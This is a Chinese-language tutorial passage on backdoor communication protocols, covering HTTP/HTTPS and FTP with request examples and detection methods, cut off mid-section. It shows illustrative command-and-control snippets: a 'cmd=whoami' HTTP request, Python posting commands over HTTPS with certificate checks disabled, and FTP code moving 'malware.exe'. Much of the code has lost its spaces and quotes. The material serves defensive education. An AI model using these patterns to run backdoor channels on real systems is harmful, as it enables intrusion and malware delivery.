传统后门攻击：后门通信协议分析_（3）.常见的后门通信协议分析.docxVIP

PAGE1

PAGE1

常见的后门通信协议分析

在上一节中，我们讨论了后门攻击的基本概念和常见的后门类型。接下来，我们将深入探讨传统后门攻击中常用的通信协议分析。后门通信协议是后门程序与攻击者之间进行数据交换的基础，了解这些协议可以帮助安全专业人员更好地检测和防御后门攻击。

1.HTTP/HTTPS协议

HTTP（超文本传输协议）和HTTPS（安全超文本传输协议）是互联网上最常用的通信协议之一。后门程序可以利用这些协议与攻击者进行通信，因为它们广泛被防火墙和安全设备允许通过。

1.1HTTP协议

HTTP是一种无状态的、基于请求-响应模式的协议。后门程序可以通过发送HTTP请求来与攻击者进行通信，这些请求可以包含恶意数据或命令。

1.1.1HTTP请求结构

HTTP请求通常包括以下几个部分：

请求行：包含方法（GET、POST等）、URL和HTTP版本。

请求头：包含客户端信息、认证信息等。

请求体：包含发送的数据，如表单数据或文件上传。

GET/command?cmd=whoamiHTTP/1.1

Host:

User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/58.0.3029.110Safari/537.3

1.1.2HTTP响应结构

HTTP响应通常包括以下几个部分：

状态行：包含HTTP版本、状态码和状态消息。

响应头：包含服务器信息、内容类型等。

响应体：包含服务器返回的数据。

HTTP/1.1200OK

Content-Type:text/plain

Content-Length:12

admin

1.2HTTPS协议

HTTPS是HTTP的安全版本，通过SSL/TLS加密来保证通信的安全性。后门程序可以利用HTTPS协议的加密特性来隐藏通信内容，使其更难以被检测。

1.2.1HTTPS请求与响应

HTTPS请求和响应的结构与HTTP类似，但数据在传输过程中是加密的。攻击者和后门程序可以通过自签名证书来建立HTTPS连接，从而绕过一些安全检测。

importrequests

#发送HTTPS请求

url=/command

data={cmd:whoami}

response=requests.post(url,data=data,verify=False)#忽略证书验证

#打印响应内容

print(response.text)

1.3检测方法

检测HTTP/HTTPS后门通信的方法包括：

网络流量分析：监控网络流量，分析HTTP/HTTPS请求和响应中的异常数据。

日志审计：检查服务器和客户端的日志文件，寻找可疑的访问记录。

证书分析：检查HTTPS连接中使用的证书，确保其合法性和可信性。

2.FTP协议

FTP（文件传输协议）是一种用于在网络上进行文件传输的协议。后门程序可以利用FTP协议上传或下载恶意文件，或者发送命令。

2.1FTP请求与响应

FTP协议使用两个端口进行通信：

控制端口（默认21）：用于发送命令和接收响应。

数据端口（默认20）：用于传输文件数据。

2.1.1FTP控制连接

控制连接通常使用纯文本进行通信，后门程序可以通过发送特定的FTP命令来执行操作。

USERattacker

PASS123456

CWD/malicious

GETmalware.exe

QUIT

2.1.2FTP数据连接

数据连接用于传输文件，后门程序可以上传或下载恶意文件。

fromftplibimportFTP

#连接到FTP服务器

ftp=FTP()

ftp.login(attacker,123456)

#上传恶意文件

withopen(malware.exe,rb)asfile:

ftp.storbinary(STORmalware.exe,file)

#下载文件

withopen(malware.exe,wb)asfile:

ftp.retrbinary(RETRmalware.exe,file.write)

#关闭连接

ftp.quit()

2.2检测方法

检测FTP后门通信的方法包括：

网络流量分析：监控FTP控制连接和数据连接的流量，分析其中的异常命令和文件传输。

日志审计：检查FTP服务器和客户端的日志文件